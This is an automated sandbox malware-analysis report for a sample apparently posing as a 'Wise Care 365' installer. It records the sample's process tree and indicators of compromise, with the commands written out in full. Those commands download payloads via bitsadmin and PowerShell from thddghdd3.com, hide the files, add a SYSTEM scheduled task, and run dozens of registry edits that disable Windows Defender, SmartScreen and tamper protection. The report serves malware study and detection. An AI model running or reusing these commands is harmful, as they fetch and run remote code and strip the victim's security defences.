SeDebugPrivilege 3476 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 3476 kernel32.exe Token: SeIncreaseQuotaPrivilege 3476 kernel32.exe Token: SeDebugPrivilege 3604 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 3604 kernel32.exe Token: SeIncreaseQuotaPrivilege 3604 kernel32.exe Token: 0 3604 kernel32.exe Token: SeDebugPrivilege 2044 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 2044 kernel32.exe Token: SeIncreaseQuotaPrivilege 2044 kernel32.exe Token: SeDebugPrivilege 2088 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 2088 kernel32.exe Token: SeIncreaseQuotaPrivilege 2088 kernel32.exe Token: 0 2088 kernel32.exe Token: SeDebugPrivilege 3372 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 3372 kernel32.exe Token: SeIncreaseQuotaPrivilege 3372 kernel32.exe Token: SeDebugPrivilege 4704 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 4704 kernel32.exe Token: SeIncreaseQuotaPrivilege 4704 kernel32.exe Token: 0 4704 kernel32.exe Token: SeDebugPrivilege 4572 kernel32.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
aad0024d7c30bf6fee7c90d90371ca14.tmppid process 2944 aad0024d7c30bf6fee7c90d90371ca14.tmp -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
Wise Care 365 5.9.1.582.tmppid process 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
aad0024d7c30bf6fee7c90d90371ca14.exeaad0024d7c30bf6fee7c90d90371ca14.tmpcmd.execmd.exeWScript.execmd.exedescription pid process target process PID 2864 wrote to memory of 2944 2864 aad0024d7c30bf6fee7c90d90371ca14.exe aad0024d7c30bf6fee7c90d90371ca14.tmp PID 2864 wrote to memory of 2944 2864 aad0024d7c30bf6fee7c90d90371ca14.exe aad0024d7c30bf6fee7c90d90371ca14.tmp PID 2864 wrote to memory of 2944 2864 aad0024d7c30bf6fee7c90d90371ca14.exe aad0024d7c30bf6fee7c90d90371ca14.tmp PID 2944 wrote to memory of 1076 2944 aad0024d7c30bf6fee7c90d90371ca14.tmp cmd.exe PID 2944 wrote to memory of 1076 2944 aad0024d7c30bf6fee7c90d90371ca14.tmp cmd.exe PID 2944 wrote to memory of 1076 2944 aad0024d7c30bf6fee7c90d90371ca14.tmp cmd.exe PID 2944 wrote to memory of 1772 2944 aad0024d7c30bf6fee7c90d90371ca14.tmp cmd.exe PID 2944 wrote to memory of 1772 2944 aad0024d7c30bf6fee7c90d90371ca14.tmp cmd.exe PID 2944 wrote to memory of 1772 2944 aad0024d7c30bf6fee7c90d90371ca14.tmp cmd.exe PID 1772 wrote to memory of 3772 1772 cmd.exe powershell.exe PID 1772 wrote to memory of 3772 1772 cmd.exe powershell.exe PID 1772 wrote to memory of 3772 1772 cmd.exe powershell.exe PID 1076 wrote to memory of 2268 1076 cmd.exe bitsadmin.exe PID 1076 wrote to memory of 2268 1076 cmd.exe bitsadmin.exe PID 1076 wrote to memory of 2268 1076 cmd.exe bitsadmin.exe PID 1076 wrote to memory of 640 1076 cmd.exe bitsadmin.exe PID 1076 wrote to memory of 640 1076 cmd.exe bitsadmin.exe PID 1076 wrote to memory of 640 1076 cmd.exe bitsadmin.exe PID 1772 wrote to memory of 320 1772 cmd.exe 7za.exe PID 1772 wrote to memory of 320 1772 cmd.exe 7za.exe PID 1772 wrote to memory of 320 1772 cmd.exe 7za.exe PID 1772 wrote to memory of 2248 1772 cmd.exe WScript.exe PID 1772 wrote to memory of 2248 1772 cmd.exe WScript.exe PID 1772 wrote to memory of 2248 1772 cmd.exe WScript.exe PID 1772 wrote to memory of 1896 1772 cmd.exe timeout.exe PID 1772 wrote to memory of 1896 1772 cmd.exe timeout.exe PID 1772 wrote to memory of 1896 1772 cmd.exe timeout.exe PID 2248 wrote to memory of 1000 2248 WScript.exe cmd.exe PID 2248 wrote to memory of 1000 2248 WScript.exe cmd.exe PID 2248 wrote to memory of 1000 2248 WScript.exe cmd.exe PID 1000 wrote to memory of 2964 1000 cmd.exe reg.exe PID 1000 wrote to memory of 2964 1000 cmd.exe reg.exe PID 1000 wrote to memory of 2964 1000 cmd.exe reg.exe PID 1000 wrote to memory of 4828 1000 cmd.exe reg.exe PID 1000 wrote to memory of 4828 1000 cmd.exe reg.exe PID 1000 wrote to memory of 4828 1000 cmd.exe reg.exe PID 1000 wrote to memory of 1992 1000 cmd.exe reg.exe PID 1000 wrote to memory of 1992 1000 cmd.exe reg.exe PID 1000 wrote to memory of 1992 1000 cmd.exe reg.exe PID 1000 wrote to memory of 768 1000 cmd.exe reg.exe PID 1000 wrote to memory of 768 1000 cmd.exe reg.exe PID 1000 wrote to memory of 768 1000 cmd.exe reg.exe PID 1000 wrote to memory of 3364 1000 cmd.exe reg.exe PID 1000 wrote to memory of 3364 1000 cmd.exe reg.exe PID 1000 wrote to memory of 3364 1000 cmd.exe reg.exe PID 1000 wrote to memory of 536 1000 cmd.exe reg.exe PID 1000 wrote to memory of 536 1000 cmd.exe reg.exe PID 1000 wrote to memory of 536 1000 cmd.exe reg.exe PID 1000 wrote to memory of 2136 1000 cmd.exe reg.exe PID 1000 wrote to memory of 2136 1000 cmd.exe reg.exe PID 1000 wrote to memory of 2136 1000 cmd.exe reg.exe PID 1000 wrote to memory of 3336 1000 cmd.exe reg.exe PID 1000 wrote to memory of 3336 1000 cmd.exe reg.exe PID 1000 wrote to memory of 3336 1000 cmd.exe reg.exe PID 1000 wrote to memory of 4824 1000 cmd.exe reg.exe PID 1000 wrote to memory of 4824 1000 cmd.exe reg.exe PID 1000 wrote to memory of 4824 1000 cmd.exe reg.exe PID 1000 wrote to memory of 1384 1000 cmd.exe reg.exe PID 1000 wrote to memory of 1384 1000 cmd.exe reg.exe PID 1000 wrote to memory of 1384 1000 cmd.exe reg.exe PID 1000 wrote to memory of 4148 1000 cmd.exe reg.exe PID 1000 wrote to memory of 4148 1000 cmd.exe reg.exe PID 1000 wrote to memory of 4148 1000 cmd.exe reg.exe PID 1000 wrote to memory of 2660 1000 cmd.exe reg.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\aad0024d7c30bf6fee7c90d90371ca14.exe"C:\Users\Admin\AppData\Local\Temp\aad0024d7c30bf6fee7c90d90371ca14.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-BKVH8.tmp\aad0024d7c30bf6fee7c90d90371ca14.tmp"C:\Users\Admin\AppData\Local\Temp\is-BKVH8.tmp\aad0024d7c30bf6fee7c90d90371ca14.tmp" /SL5="$9003A,38098121,731648,C:\Users\Admin\AppData\Local\Temp\aad0024d7c30bf6fee7c90d90371ca14.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml4⤵
- Download via BitsAdmin
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/wlanext32.exe C:\Users\Admin\AppData\Local\Temp\wlanext32.exe4⤵
- Download via BitsAdmin
-
C:\Windows\SysWOW64\xcopy.exexcopy /y "C:\Users\Admin\AppData\Local\Temp\wlanext32.exe" "C:\ProgramData\Local\Microsoft\Windows\Telemetry\"4⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\xcopy.exexcopy /y "C:\Users\Admin\AppData\Local\Temp\Telemetry.xml" "C:\ProgramData\Local\Microsoft\Windows\Telemetry\"4⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H C:\ProgramData\Local\Microsoft\Windows\Telemetry\*.*4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /RU SYSTEM /TN "Telemetry update-S-1-5-21-3460174932" /XML "C:\ProgramData\Local\Microsoft\Windows\Telemetry\Telemetry.xml"4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\PING.EXEPing -n 3 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 3 127.0.0.14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe x -y -p1r7d2kvUf3 "*.7z"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\ConsoleApp\ControlSet003.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet001.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f6⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f6⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f6⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f6⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f6⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f6⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f6⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f6⤵
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f6⤵
-
